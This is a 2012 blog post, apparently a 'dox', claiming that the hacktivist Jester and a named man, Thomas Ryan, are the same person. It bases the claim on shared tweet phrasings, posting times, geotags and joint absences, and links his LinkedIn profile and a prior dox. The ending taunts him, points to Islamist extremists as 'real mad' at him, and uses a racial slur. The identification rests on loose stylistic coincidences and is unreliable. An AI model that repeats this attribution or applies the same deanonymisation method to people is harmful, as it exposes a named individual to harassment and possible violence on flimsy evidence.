http://www.darkreading.com/insider-threat/167801100/security/privacy/225702468/index.html

INTERESTING FACT: @RobinSage joined Twitter on 26th December 2009 – exactly one week after @th3j35t3r joined.

The connection between Tom Ryan, Robin Sage and Jester was first brought to my attention by this tweet from @LulzKitten on 29th March 2012:

“Okay, let’s cut the crap, hello @Th3J35t3r aka@TomRyanBlog aka robinsage. Game over. Was fun, at least sometimes. Next nemesis, plox!”
(Note: Direct links to all tweets quoted in this dox can be found cited in the conclusion.) After reading LulzKitten’s tweet, I cast a casual glance over the Twitter feeds of Tom Ryan and Jester, and instantly noticed some similarities between the pair.

The most damning evidence linking TR and J – the smoking gun – will be presented towards the end of this dox, if you can wait that long, but first, let’s perform some writing analysis. After all, if TR and J are the same person, there ought to be some similarities in their writing styles, surely? You betcha. Here we go then:

Anyone who’s followed J on Twitter and read his blog may have noticed that he has a very distinctive writing style. Let’s pick through some of Jester’s trademark phrases, and then see if we can spot them recurring in TR’s tweets:

4. ‘Hmmmm’. Jester likes to say ‘Hmmm’ ‘Errr’ and ‘Ahemmm’ a lot. In fact he likes to say them so much that he even uses these filler phrases in his blog titles, as well as littering his tweets with them. Here’s some examples:

5th April: “@deftpunkz – umm holy shit. I dont know what to say guys, errrr thanks, i think? -”

4th April: “Al-Qaida ‘blacked out’ on the internet (effectively switched off) >>>http://timesofindia.indiatimes.com/tech/news/internet/Al-Qaida-blacked-out-on-internet/articleshow/12529550.cms #infosec#saladin #ahemm”

3rd April: “Now…… imagine…… how many of those listed in my last, were ummmmmm – on the ‘shit list’ – just a thought??? #anonymous”

27th Feb: “#Wikileaks & #anonymous dump 5 million#strafor internal emails obtained by #anonymouslast Dec..umm this right here…”

21st March: “Anti-Anonymous hacker threatens to expose them (via MSNBC) http://www.msnbc.com/id/46716942<<< ummm too late. #military #cyber #security#infosec #DoD”

15th Nov, WordPress blog title: “Occupy Wall Street?? 99%?? Ummm.”

Hmmm, I wonder if Tom Ryan also likes to say ‘Hmmm’? Let’s take a look:

10th April: “How To Prevent Data Leaks From Happening To Your Organization http://zite.to/HCucc8hmmm…how do you prevent the carbon factor from leaking?”

6th April: “Hmmm So @AnonW0rmer is arrested at 10:30http://j.mp/HiAASP tweets till 3:32, @ItsKahunadisappears @AnonymousIRC disappears for 4 Day >>>”

15th March: “CSI tonight has a scent of Anonymous. Anthropology professor teaching about Hactivism. Hmmm who came it be?”

11th March: “@kennethlipp hhhmmmm do you think any anons donated money to his reelection campaign?”

7th March: “@CryptKper @v0ld4m0rt you are spot on! Who could that have been? Hmmmmm”

16th Feb: “@agentdarkapple Interesting! Hmmm! I can see why you think I would be L and you would be N. L doesn’t smile like me”

OK, that’s enough Hmming – on to point #5: ‘Tick tock’. Jester loves to say ‘Tick tock’ – it’s one of his favorite phrases. Look:

6th March: “From 3.5 months ago:https://th3j35t3r.wordpress.com/2011/11/19/if-i-am-wrong-ill-say-im-wrong-heres-my-apology/…… from 1 hour ago ….http://www.foxnews.com/scitech/2012/03/06/hacking-group-lulzsec-swept-up-by-law-enforcement/ tick tock toldya.”

3rd August: “’RT @anonymousabu: @hjjrc @SparkyBlaze Your problem is with a ghost. Someone you can neither find nor stop.’ << you have same problem. #tick”

27th July: “@anonymousabu tick tock.”

24th July: “TICK TOCK. #toldyac2dc37a7d9d3238877a127f2d5171c9d”

21st June: “Tickety Tock…..”

25th June blog entitled LulzSec’s Cloudflare Configuration: “Tickety Tock Tock.”

Why, isn’t that a quirky little phrase? I wonder if Captain Hook – sorry, Tom Ryan – also uses the same terminology. Oh, what’s this we have here from 27th Feb?

“#Anonymous I am working on my big release. Hmmmm who should it goto? Tick Tock”

There’s even a ‘Hmmmm’ thrown in for good measure. How Jester-esque!

With a nudge and a wink, we move onto #6: Jester loves nothing more than to sign off his tweets with a sly wink. Just like so:

28th March: “@wwpinc – just in case you were not aware: >>>https://th3j35t3r.wordpress.com/support/ <<< – keep up the great work ;-) Peace. #pgr #wwp#woundedwarrior”

26th March: “Al-Qaida forums crippled in suspected cyber intervention http://j.mp/GSd8ih << bad things happen to bad people, apparently ;-) #infosec”

11th March: “@RepDanGordon @FBIPressOffice I merely stated u were on the list, u seem awful jittery. U need to calm down >> ;-)”

2nd Oct: “RT: @mach2600 @th3j35t3r It’s wobbling … up, down, up, down… <<< gotta love NGINX – always somethin huh ;-)”

16th June: “standby for supporting clarification onhttp://th3j35t3r.wordpress.com/2011/06/16/quick-n-dirty-just-for-clarification/?utm_source=Jesters+Court+Blog&utm_medium=twitter – close ya eyes if ya already saw it yesterday. ;-)”

2nd June: “http://www.foxnews.com/scitech/2011/06/02/pentagon-has-secret-list-cyber-weapons/ – #justsayin;-) #oorah”

Now it’s TR’s turn to have a sly wink:

5th April: “The beauty of data-mining in a social world, I don’t need to be connected to you, so you can’t block me. You just need to be on my radar ;-)”

5th April: “@x_ryujin_x @render64 @bitchiest @kalyptonetthink of what full dox did for Sabu ;-)”

4th April: “@LauraWalkerKC @BobbyCarbon@NavySEALsORG @Packetknife @HonorThemYou should record it ;-)”

14th March: “To Geeks & Nerds 3/14 is known as Pi Dayhttp://www.youtube.com/watch?v=JTZtuMdkUksTo Horny Men it’s known as Steak & Blow Job Day! The GF reminded me ;-)”

13th March: “@JackalAnon warned #Anonymous 2 Days Ago about OAuth and Apps. We’ve warned you about TOR. ;-)”

14th Feb: “Why I’m Glad My Boyfriend Isn’t On Facebook – Forbes http://j.mp/z9XNrP by @kashhill | Leaving Facebook made me never want to go back ;-)”

Next up, it’s similarity #7 – ‘Stay Frosty’. This, Jester’s catchiest of catch-phrases, crops up all over his tweets:

2nd April: “http://www.cbsnews.com/2100-202_162-20075647.html <<< still going on about this? Stay frosty and have a Cupcake??”

10th Nov: “#stayfrosty -Word of advice 2 @barrettbrownlol: Just because you’re paranoid doesn’t mean they aren’t out to get you. >”

26th Oct: “#hackerhalted left a little something under the projector in Alhambra SCADA room. Tweet me a photo of what’s there. #stayfrosty”

25th Oct: “#hackerhalted delegates … Stay clear of Cafe Bastille. Great sushi at Bali Cafe though… Stayin frosty.”

Now let’s see what Monsieur Ryan has to say for himself:

10th April: “Iran plans to unplug the Internet, launch its own “clean” alternative http://zite.to/Iqm1Ba#anonymous @CabinCr3w Stay Frosty ;-)”

16th March: “@testeux1 Class on Strategy? I can teach one at The Spy Museum in DC @wikileaks @revmagdalen@AnonymousIRC @YourAnonNews Stay Frosty ;-)”

13th March: “#Anonymous in your time of fear those of you that have used delete.twitlan / tweeteraser / twitwipe A Special Thank You!!! Stay Frosty! ;-)”

13th March: “@jackie_singh @krypt3ia I was promoted today to Brigadier General Packet of The Cyber Brigade@th3j35t3r now reports to me! Stay Frosty ;-)”

12th March: “Finch + Reese = ;-) …. Stay Frosty & Watch Your 6!”

Hang on a sec, isn’t it a bit, well, *obvious* for Tom Ryan to be liberally dropping Jester’s favorite catchphrase into his tweets? Yep, you’re right – it’s very obvious. But here’s the thing: the AntiSec dox that named Jester as Tom Ryan landed in Pastebin on 11th March. Notice how TR deliberately goes out of his way to play up to the ‘Stay Frosty’ caricature in the ensuing days? That’s because he realizes that the more he pretends to be Jester, the more people will be inclined to write him off as just another Jester wannabe. For another example of this tactic, here’s how J tweets every time he downs a Muslim extremist website:

1st March: “http://www.rjfront.info – TANGO DOWN. Temporarily. For enabling recruitment, & co-ordination of jihadist terror cells via web.”

1st March: “http://www.atahadi.com – TANGO DOWN. Temporarily. For online incitement to cause young muslims to carry out acts of violent jihad.”

Exactly one month later, on 1st April, TR tweets the following:

“www.ic3 .gov – TANGO DOWN. Temporarily. For not doing your job, & not arresting #Anonymous”

And: “www.fbi .gov – TANGO DOWN. Temporarily. For enabling recruitment, & co-ordination of#Anonymous via web.”

At this point, obvious troll is obvious – within days of LulzKitten’s tweet linking Tom Ryan and Jester, TR goes out of his way to tweet ‘Stay Frostys’, Jester winks and ‘TANGO DOWN’s. To give him credit, it’s a pretty smart way to make people think you’re nothing more than a Jester fanboy. Sadly for Thomas, it’s too late; the evidence linking Tom Ryan to Jester began from the moment TR began tweeting in January 2012. Prior to AntiSec dropping Jester’s dox on 11th March, Tom Ryan had only tweeted ‘Stay Frosty’ twice in three months. Immediately afterward, he tweets it five times in four days – complete with the Jester’s trademark wink.

So does that mean that all of the foregoing information is is part of an elaborate ploy, cooked up by Tom Ryan and Jester, to obfuscate the identity of the real Jester? In the case of the ‘Stay Frostys’ and the ‘TANGO DOWN’s, yes, it probably is. Thankfully, there are dozens of other textual similarities between the pair – similarities that are too subtle to be part of a pre-planned disinformation campaign.

Which leads nicely on to point #8: ‘Much’. Note the phrase that appears in the following tweets from Jester:

18th June: “http://www.techhomethebacon.com/news/hacking-infosec/th3j35t3r-links-nakomis-to-lulzsec-group-cover-up-ensues.html – backpeddaling much? Hacked? lol. -”

18th June: “Back-pedalling much?https://twitter.com/#!/Anonakomis/status/81862870664609792 #js”

August 21st WordPress blog entitled If ya can’t beat em, make some shit up??? LMAO!: “coincidence much?” “projection much??”

I wonder if TR ever lets slip a similar phrase? Oh, what’s this?:
14th March: “@kaepora Nadim, delete much? You’re in the snitch crew ?https://twitter.com/#!/realytcracker/status/143411708369715201 of @Anonymousabu & @ioerror”

Coincidence much?

#9: Jester loves to leave trailing dots in his tweets:

9th April: “<<< drums fingers on desk….”

3rd April: “Now…… imagine…… how many of those listed in my last, were ummmmmm – on the ‘shit list’ – just a thought??? #anonymous”

22nd November: “AFK…….”

He also uses trailing dots when he’s typing live into Notepad in this YouTube video: http://www.youtube.com/watch?v=WeO44IWlkfU

More of Jester’s ‘trailing dots’ tweets are cited at the end of this dox. Now it’s TR’s turn to deploy this tactic:

6th April: “@kennethlipp that’s how it went down with Barrett Brown too. Remember they ended up going to every address for him….according to him”

5th April: “@Bitchiest @KalyptoNet @TomRyanBlog The Secretary disavows this tweet and everybody in it…”

4th April: “#Anonymous ever wonder why certain high ups in your collective are never V& …. Look at cases that never went to court & who has relocated”

Again, more examples of this idiosyncrasy can be found cited at the end of this dox, as well as liberally scattered throughout Tom Ryan’s Twitter feed.

#10: Arrows. Jester loves to use arrows to break up words in his tweets, <<just like this>>:

9th April: “”@VizFoSho: @th3j35t3r dun goofedhttp://www.picvalley.net/u/1980/407013641289457528133400533586itAR4VE93lm7DAkGd2.PNG@RepDan_Gordon” <<< Shit ya got me! What am I to do? Btw now I am near north pole.”

28th March: “@wwpinc – just in case you were not aware: >>>https://th3j35t3r.wordpress.com/support/ <<< – keep up the great work ;-) Peace. #pgr #wwp#woundedwarrior”

Now TR:

6th April: “Hmmm So @AnonW0rmer is arrested at 10:30http://j.mp/HiAASP tweets till 3:32, @ItsKahunadisappears @AnonymousIRC disappears for 4 Day >>>”

13th March: “Don’t know whether to laugh or feel bad but come on: (compatible;+MSIE+6.0;+Windows+98;+Win+9×4.90) << In This Day An Age??”

9th March: “conspiracy 1. a plan or agreement to carry out an illegal or harmful act 2. the act of making such plans >> aka #Anonymous Ops #justsayin<<”

Glance through their tweets and you’ll see that J and TR use <<arrows>> all the time.

#10: UPPER CASE. Compare the tweets of J and TR and you’ll notice that they both love to highlight single words in capitals. Jester first:

9th April: “WARNING: Tweeps in mirror are closer than they appear.”

18th March: “I’m still asked WHY I hit #wikileaks, skip to 28mins 12secs & Major TJ O’Connor abt sums it uphttp://www.youtube.com/watch?v=buY3I4PkK98<<worth watching it all.”

11th March: “@repdangordon be advised, when u file ur complaint to feds, they ARE going need ur cell for forensics to determine IF I hacked u at all ;-( ”

Tom Ryan’s turn:

5th April: “INTERESTING: What is this ugly brown stain on a Key Member of Anonymous’ back? I need to do my cropping for the new site launch. Peace!”

5th April: “#Anonymous why so many military and sovereign citizen connections? GOD I aam glad I took 2 weeks to lay low.”

4th April: “@MaxVenator Too cold and windy for the Hamptons BUT you gave me a good idea. Maybe we can turn Plum Island into a resort for#Anonymous”

Jester and Tom Ryan both use this technique DOZENS of times in their tweets.

#11 features a more subtle similarity between our Jester and our Clown:

Jester, 21st August: “If ya can’t beat em, make some shit up??? LMAO! -”

TR, 16th March: “@exiledsurfer ROFLMAO! Reminds me of being in Bahrain & Abu Dhabi hearing Garth Brooks “Friends in Low Places””

Jester and Thomas don’t always laugh their asses off, but when they do, you can bet it’s in upper case with an exclamation mark at the end. (More examples, as always, are cited in the conclusion of this dox.)

#12: J and TR aren’t very good at spelling. They struggle especially with words such as ‘its’ and ‘it’s’. Jester’s tweets aren’t usually too bad for typos, as he doesn’t rush them (because he knows they will be analyzed by a wide range of foes who might otherwise have cause to mock him for his poor grammar). He also has the autocorrect on his Android phone to help him. He still struggles with those pesky apostrophes that autocorrect can’t pick up however, especially when he tweets from his desktop:

6th March: “WTF is Wikileaks gonna do now it’s source of illegally obtained private info (anon/lulz) has had it’s head & skillset removed? #2birds1Stone”

21st June: “Seems almost as if ‘somebody’ doesn’t want you to see my last link – here’s a pastebin of it’s content.”

In his WordPress blog however, Jester often mixes up his apostrophes, especially in words such as ‘its’:

“With Netcat listening at the other end for incoming connections, you can configure it to execute it’s own script when it receives a connection for example to send a Message of the Day to the connecting device, you would run netcat like this on your server”

Watch his two YouTube videos (links cited at the end) in which he types directly into Notepad and you’ll see he also fails to put apostrophes into words such as ‘lets’, ‘its’ and ‘Thats’. 2:20 into his XerXes DoS Attack video and you’ll see that the text displayed on Jester’s self-designed software also contains typos: ‘SUCCESFULLY’ should have two ‘s’ in the middle, while at 2:29, you’ll see that ‘Secured’ has also been spelt wrongly. At 6:52 he also makes the same error when typing into Notepad.

Does Tom Ryan fare any better in the spelling stakes? No. In fact he’s even worse when it comes to tweeting typos. That’s because Thomas tweets ten times as frequently as Jester, tweets more hastily (lots of rushed replies to his Twitter buddies) and because he writes the tweets on his Mac, which doesn’t autocorrect his mistakes. Look:

4th April: “@AdrianChen surprised your not all over the@Anonw0rmer arrest and shortly after the disappearance of @itskahuna”

5th April: “To those I owe something too, It’s on it’s way!”

30th March: “RED ALERT: tomorrow is #NoClick31 just as a precaution. Rumor has it #Anonymous is using it’s Porn Bots for #opBlackout click to DDOS attack”

Wanna see more? Just read his tweets.

OK, we’ve almost reached the really juicy stuff linking Jester and Thomas, but first there are a couple more writing similarities to rattle through:

#13: J and TR write numbers numerically rather than alphabetically – even when composing short tweets.

Jester, 28th Feb: “4 more Anons V&’ed http://tinyurl.com/8a2g5k5#anonymous”

10th Nov: “#stayfrosty -Word of advice 2 @barrettbrownlol: Just because you’re paranoid doesn’t mean they aren’t out to get you. >”

27th November: “#saladin (XerXes bro)- ‘the best weapon is the one u never have 2 fire…I prefer the weapon u only need 2 fire once.’”

20th July: “Never saw a wild thing sorry 4 itself. Small bird drop frozen dead from bough without ever having felt sorry 4 itself.”

TR – yep, you’ve guessed it – does exactly the same:

5th April: “@ohmylulz will with 2 False Positives.@missarahnicole @AsherahResearch”

4th April: “Ruh roh! A certain key #Anonymous member disappears for 4 days then reappears. We know what that means.”

3rd April: “@Ihazcandy I should start digging into them. Since I have 2 weeks of downtime.”

OK, moving on (we’re nearly done, I promise) to #14: Hashtags. If you go to tweetstats.com and enter TR and J’s twitter names into separate windows, a series of pretty graphs will be generated that will allow you to compare their tweeting patterns. You’ll notice that they tweet from separate devices, to eliminate the possibility of accidentally tweeting to the wrong account – Tom Ryan likes to keep his iPhone in one pocket and his Android in the other for when he’s playing Jester. Click on the Tweet Cloud tab at the top of the page and you’ll be able to view the most frequent hashtags used by both parties. Not too surprisingly, given their obsession with all things masked, it’s #anonymous. There are also three other hashtags that the pair use prominently however – #fail, #justsayin and #infosec. The latter one is understandable, but the other two? Interesting. Let’s see some #fail and #justsayin in action, starting with Jester:

3rd November: “#opcartel #anonymous You should really listen to what this man has to say. Remember your track record is full of #fail”

15th August: “@anonymousabu U R #fail. U hurt who u claim to fight for (lol), u have agenda < http://reg.cx/1Qps& the agenda is >”

14th August: “So @landrytom u finally got ur mention. Damn u zeroed my ‘xchat’? Please all check out his timeline. Then ask him where is the pwnage? #fail”

29th July: “1st up: My doxing. That’s a #fail. (again) I have never been Ryan Berg, John Willander, Robin Jackson, Anthony Freed, Beau Colvin. #opFrosty”

2nd June: “http://www.foxnews.com/scitech/2011/06/02/pentagon-has-secret-list-cyber-weapons/ – #justsayin;-) #oorah”

Now it’s Tom Ryan’s turn to #Fail (#Justsayin):

5th April: “@agentdarkapple @AsherahResearch she’s definitely is no @elizadushku , Mila Kunis or Megan Ackerman. So she’s a #Fail”

2nd April: “@subverzo TY for verifying 2 alternate personas yours & @CrappyTires . FYI, Everyone in the CT world knows Shumukh al-Islam Forum. #FAIL”

9th March: “@AnonymousIRC you do know they rig cases to#FAIL inorder to capture bigger FISH ….. Right?@atopiary @lolspoon @AnonymouSabu”

9th Feb: “Dangerous Tweets: Arrested, fined in 140 characters or less http://j.mp/yWAV4G << What ever happened to contextual analysis? another#Fail” (Note the classic Jester-style arrows used in this tweet as well.)”

10th March: “#anonymous remember threatening people or family members can lead to several crimes. If they are harmed it becomes much worse. #justsayin”

9th March: “conspiracy 1. a plan or agreement to carry out an illegal or harmful act 2. the act of making such plans >> aka #Anonymous Ops #justsayin<<”

Plenty more examples, as always, can be found cited in the footnotes at the end of this dox.

OK, here endeth the writing analysis lesson. Thank you for your patience :) It would be fair to say we’ve established that Jester and Tom Ryan tweet in an uncannily similar manner, but that’s not all. Now we get on to the really good shit…

#15: Tweet times. Using tweetstats.com, it’s possible to compare the times at which J and TR tweet. A quick glance at their respective Tweet Density graphs reveals a similar pattern: neither of them tweets between 3am and 7am EST: they’re both East coast bitches. Interesting.

#16: A few days ago, @VizFoSho tweeted the following image:

http://www.picvalley.net/u/1980/407013641289457528133400533586itAR4VE93lm7DAkGd2.PNG

It depicts two Jester tweets from 7th April, both geo-stamped with Atlantic City, NJ on them. Atlantic city is within 150 miles of NY, where Tom Ryan lives. On 26th March, Jester also posted a single tweet from New York: https://twitter.com/#!/th3j35t3r/status/184333789697282048

Normally, Jester’s tweets don’t reveal his location. Up until April 2012, there had only been four instances in which Jester’s tweets revealed his location – and two of those occurred when he was at DEFCON Nevada and Hacker Halted in Miami, occasions when he was undoubtedly eager to reveal his location in order to prove he was in attendance. Were the New York and Atlantic City revelations accidental (Tor for Android not working properly perhaps?) or was Jester trying to provide more misinformation?

After @VizFoSho pointed out the NJ link (the NY slip-up had gone unnoticed), Jester went out of his way to post two tweets from ridiculously exotic locations – Cape Town on 9th April and then Hawaii on 10th April:

https://twitter.com/#!/th3j35t3r/status/189464600318722049
https://twitter.com/#!/th3j35t3r/status/189464600318722049 “The octopus here is amazing. Dontcha think :-)”

Jester has never previously switched his location to a far-flung location purely for the lulz. Why should he suddenly be trying so hard now that he’s been identified as an East coast slacker? If he’s not Tom Ryan, why should be bothered if people think he’s from NJ or NY?

On 4th April, Jester made the second of his two Atlantic City tweets at 4:03pm. 11 minutes earlier, Tom Ryan had also posted a tweet. For the next 48 hours, neither account tweeted – a rare occurrence, especially for TR who averages over 30 tweets a day. Enjoying a couple of days in Atlantic City playing the slots, perhaps?

Here are the 4th April tweets from both parties:

https://twitter.com/#!/th3j35t3r/status/187610604314431488

https://twitter.com/#!/th3j35t3r/status/187616455762784257

https://twitter.com/#!/TomRyanBlog/status/187612824187584512

Curiouser and curiouser. But that’s not all. On 23rd March, TR tweets:

“Headed to South Beach to enjoy this great weather! Later Tweeps!”

https://twitter.com/#!/TomRyanBlog/status/183199880922148864

For the next 48 hours, Jester and Tom Ryan are both absent from Twitter.

A month earlier, on 17th February, the same thing happens after TR tweets:

“Off the Grid for a few days ! Have a great 3 day weekend!”

https://twitter.com/#%21/TomRyanBlog/status/170321854723129344

For the next four days, neither party tweets. The first person to break the Twitter silence is Jester, and it’s another rare instance of him revealing his location – Arlington VA.
https://twitter.com/#!/th3j35t3r/status/172077181051219968
Enjoy your three-day weekend, Thomas?

I stated earlier that until April Jester had never previously switched his location to a far-flung country, but I lied – there IS actually one occasion when Jester appeared to be out of the country. On 25th January, he posted the following tweet:

“To all who have DM’ed asking after my whereabouts & welfare…am safe & limbering up. It’s a brave new year. TY 4 support. Stay Frosty.”
https://twitter.com/#!/th3j35t3r/status/162261098035298304

His alleged location? Brescia, Italy. What about Thomas Ryan – what was he up to around this time? Well here’s the thing: between 23rd and 26th January, TR (a man who likes to tweet all day, erryday) doesn’t post a single tweet. Too busy enjoying the bruschetta, washed down with a bottle of Barolo perhaps?

A final word on correlating Twitter times before we move onto our final two points: take a look at the timeline for Jester and Tom Ryan’s tweets. Notice how they often tweet at almost exactly the same time as one another? For example, take Tuesday 10th April. After two hours without activity from either account, Thomas posts the following at 15:30pm:
“Now I feel really special. Someone created a hidden stream about me and monitors it.”
One minute later, at 15:31, Jester tweets “@alemarahweb‏ – ‎http://www.alemara1.com‏ – TANGO DOWN – أنا كنت”
Observe any two Twitter accounts for long enough and you’ll find timing coincidences of course. However, compare Jester and Tom Ryan’s accounts on any given day and you’ll spot a predictable pattern: they always broadly correlate i.e. there is a short burst of tweets, followed by a 45 minute break while Jester/Ryan goes for a wank or to chow down some beef jerky.

Right, two more points to raise and then I’ll leave you in peace:

#17: When LulzKitten tweeted Jester’s dox on 29th March, how did Tom Ryan – the man with the military wallpaper on his Twitter page – respond? “@J_P_Holloway @lulzkitten @YourAnonNewsyou guys really suck at DOXing thinking I am@th3j35t3r everyone knows I was never in the Army #fail”
https://twitter.com/#!/TomRyanBlog/status/185189598677319680

Two things stand out here: firstly, we have no way of knowing that Jester was in the army. Yes, he has an interest in all things military, but the rumor that he actively served in the army is widely believed to be false.

On 13th March however, TR tweeted the following: “When I was in the military, Greenpeace would try to board Aircraft Carriers. Some things aren’t smart & never thought of till it’s too late.”
https://twitter.com/#!/TomRyanBlog/status/179637065154170880

Military, shmilitary; does anyone see a connection here? Thought so. Without further ado, let’s proceed to our final, fateful tweet of interest. On 10th February, Thomas Ryan tweeted the following:

“I wonder if operating Multiple Personas has ever given anyone Multiple Personality Disorder.”

I don’t know Jester, you tell me ;) Tick tock. No response? Oh well, Stay Frosty…

**********

POSTSCRIPT: Could it be that Tom Ryan is such an attention-whore that he’s trolling us all in the hope of being mistaken for the Jester? I guess it’s technically possible, but if so, it’s the most elaborate and painstaking trolling campaign ever conceived – and one that would have to involve the collusion of both parties. If, by some miracle, Thomas Ryan is not Jester, he knows exactly who Jester is – to the extent where he probably even vacations with him. When you review all the evidence however, there can only be one logical conclusion to draw: they are one and the same person.

On 13th March, Tom Ryan posted the following poignant message: “@ArtByAlida although Anonymous doesn’t like@th3j35t3r I do. It’s safer that certain people are never doxed.”
https://twitter.com/#!/TomRyanBlog/status/179636120710152192

You’re right Tom – it would be safer, but the truth always comes out in the wash, don’t you find? I hope you’ve got a few passports lying around, cos you’re gonna need them. Remember those Muslim extremists whose websites you downed and whose threats you retweeted? Oh, they mad. They real mad.

One last thought before I shovel the dirt over Jester’s shriveled corpse: I notice that your Twitter nick is Boondock Saint, in tribute to The Boondock Saints, a movie about two Irish vigilantes. Just out of interest, I wonder what The Internet Surname Database would make of Thomas Ryan’s moniker?

http://www.surnamedb.com/Surname/Ryan

Why, they appear to believe that Ryan is an Irish surname. To quote from my favorite hacktivist for good, ‘Coincidence much?’

Congratulations Thomas; you just got pwned by an amateur who doesn’t even have the skills to label himself a skid, never mind a hacker. Butthurt much?

In the words of your nemesis, @anonymouSabu, “Nigga, troll harder.”

pwned by @spoolfiend

**********

Citations:

LulzKitten tweet linking TR and J: https://twitter.com/?utm_medium=twitter&utm_source=twitterfeed#!/YourAnonNews/statuses/185150794079809536

Check when th3j35t3r and RobinSage joined Twitter: http://www.whendidyoujointwitter.com/

TR’s LinkedIn (where you’ll see proof that he attended Hacker Halted and DEFCON last year): http://www.linkedin.com/in/tommyryan

TR and J professing their love of sushi:
https://twitter.com/#!/TomRyanBlog/status/178202424056610817
https://twitter.com/#!/th3j35t3r/status/128849629939892224

Tom Ryan dox by AntiSec: http://pastebin.com/ZAxBWKi8

J likes to say ‘Hmmm’ a lot:

https://twitter.com/#!/th3j35t3r/status/187996120180457472

Occupy Wall Street?? 99%?? Ummm.

https://twitter.com/#!/th3j35t3r/status/186958030791905282

https://twitter.com/#!/th3j35t3r/status/174163673940631552

https://twitter.com/#!/th3j35t3r/status/182268058168082432

https://twitter.com/#!/th3j35t3r/status/187535767843778560

TR also likes to say ‘Hmmm’:

https://twitter.com/#!/TomRyanBlog/status/188096685250068480

https://twitter.com/#!/TomRyanBlog/status/180117386291195906

https://twitter.com/#!/TomRyanBlog/status/178896960546287617

https://twitter.com/#!/TomRyanBlog/status/177482894443417600

https://twitter.com/#!/TomRyanBlog/status/170195932388925441

https://twitter.com/#!/TomRyanBlog/status/189680060863754241

J goes ‘Tick tock’:

https://twitter.com/#!/th3j35t3r/status/96268183723450369

https://twitter.com/#!/th3j35t3r/status/177033974324002816

https://twitter.com/#!/th3j35t3r/status/83145887307677696

https://twitter.com/#!/th3j35t3r/status/95195869921554433

https://twitter.com/#!/th3j35t3r/status/98828156663889920

Lulzsec’s CloudFlare Configuration

TR goes ‘Tick tock’:

https://twitter.com/#!/TomRyanBlog/status/174132025215811585

J ‘Stay frosty’:

https://twitter.com/#!/th3j35t3r/status/186923663734489088

https://twitter.com/#!/th3j35t3r/status/134434056925483008

https://twitter.com/#!/th3j35t3r/status/129246959021203456

https://twitter.com/#!/th3j35t3r/status/128849629939892224

https://twitter.com/#!/th3j35t3r/status/81862725638160385

https://twitter.com/#!/th3j35t3r/status/76373640832225282

TR ‘Stay frosty’:

https://twitter.com/#!/TomRyanBlog/status/189679107347460097

https://twitter.com/#!/TomRyanBlog/status/180689040385900544

https://twitter.com/#!/TomRyanBlog/status/179655809280655361

https://twitter.com/#!/TomRyanBlog/status/179298552680415232

https://twitter.com/#!/TomRyanBlog/status/178571536691765249

https://twitter.com/#!/TomRyanBlog/status/178529239052730368

https://twitter.com/#!/TomRyanBlog/status/178336251240382464

https://twitter.com/#!/TomRyanBlog/status/179622057305317376

https://twitter.com/#!/TomRyanBlog/status/179802508372344832

J likes to wink:

https://twitter.com/#!/th3j35t3r/status/184373769958211584

https://twitter.com/#!/th3j35t3r/status/120271829377097728

https://twitter.com/#!/th3j35t3r/status/76373640832225282

https://twitter.com/#!/th3j35t3r/status/185019516793786370

https://twitter.com/#!/th3j35t3r/status/81477469135319040

https://twitter.com/#!/th3j35t3r/status/178878010961833986

TR likes to wink:

https://twitter.com/#!/TomRyanBlog/status/187885131976024064

https://twitter.com/#!/TomRyanBlog/status/187372927946211328

https://twitter.com/#!/TomRyanBlog/status/179932280809197568

https://twitter.com/#!/TomRyanBlog/status/180689040385900544

https://twitter.com/#!/TomRyanBlog/status/189679107347460097

https://twitter.com/#!/TomRyanBlog/status/169492746871119873

https://twitter.com/#!/TomRyanBlog/status/179655809280655361

https://twitter.com/#!/TomRyanBlog/status/179802508372344832

https://twitter.com/#!/TomRyanBlog/status/179669923163938816

https://twitter.com/#!/TomRyanBlog/status/187914228810784769

J ‘much?’:

https://twitter.com/#!/th3j35t3r/status/82200919365787648

https://twitter.com/#!/th3j35t3r/status/81871769832665088

If ya can’t beat em, make some shit up??? LMAO!

TR ‘much?’:

https://twitter.com/#!/TomRyanBlog/status/179927195022659584

J ‘…’:

https://twitter.com/#!/th3j35t3r/status/189139338796351492

https://twitter.com/#!/th3j35t3r/status/186958030791905282

https://twitter.com/#!/th3j35t3r/status/186749312166932483

https://twitter.com/#!/th3j35t3r/status/128849629939892224

https://twitter.com/#!/th3j35t3r/status/138951576789331968

https://twitter.com/#!/th3j35t3r/status/168769540598145025

https://twitter.com/#!/th3j35t3r/status/179233292682407937

https://twitter.com/#!/th3j35t3r/status/184321677092597760

TR ‘…’:

https://twitter.com/#!/TomRyanBlog/status/188088227704487936

https://twitter.com/#!/TomRyanBlog/status/187342615648272384

https://twitter.com/#!/TomRyanBlog/status/188829946439929856

https://twitter.com/#!/TomRyanBlog/status/189449964219400194

https://twitter.com/#!/providesecurity/status/187253830315016192

https://twitter.com/#!/TomRyanBlog/status/189757038778269696

https://twitter.com/#!/Render64/status/187912159655772161

J ‘<<arrows>>’:

https://twitter.com/#!/th3j35t3r/status/189463655811780609

https://twitter.com/#!/th3j35t3r/status/185019516793786370

TR ‘<<arrows>>’:

https://twitter.com/#!/TomRyanBlog/status/179683104972210176

https://twitter.com/#!/TomRyanBlog/status/188096685250068480

https://twitter.com/#!/TomRyanBlog/status/177907983227949056

https://twitter.com/#!/TomRyanBlog/status/178555495806803968

https://twitter.com/#!/TomRyanBlog/status/179321093897723904

J using UPPER case:

https://twitter.com/#!/th3j35t3r/status/189165520556277761

https://twitter.com/#!/th3j35t3r/status/178895612723478531

https://twitter.com/#!/th3j35t3r/status/181438361511280640

https://twitter.com/#!/th3j35t3r/status/82538803188862976

https://twitter.com/#!/th3j35t3r/status/98386681836736512

https://twitter.com/#!/th3j35t3r/status/177544329458491392

https://twitter.com/#!/th3j35t3r/status/135438221483048960

https://twitter.com/#!/th3j35t3r/status/177568887334903808

https://twitter.com/#!/th3j35t3r/status/110676313366462464

https://twitter.com/#!/th3j35t3r/status/127396730621788160

https://twitter.com/#!/th3j35t3r/status/100282273072549890

https://twitter.com/#!/th3j35t3r/status/178566407909412866

https://twitter.com/#!/th3j35t3r/status/132173511874711552

https://twitter.com/#!/th3j35t3r/status/94485325744848896

https://twitter.com/#!/th3j35t3r/status/97333572955947008

https://twitter.com/#!/th3j35t3r/status/91970882095943680

https://twitter.com/#!/th3j35t3r/status/141002481260961792

TR using UPPER case:

https://twitter.com/#!/TomRyanBlog/status/187908914417893379

https://twitter.com/#!/TomRyanBlog/status/188461215348031489

https://twitter.com/#!/TomRyanBlog/status/187018163567853568

https://twitter.com/#!/TomRyanBlog/status/185423913197637633

https://twitter.com/#!/TomRyanBlog/status/187240901574266881

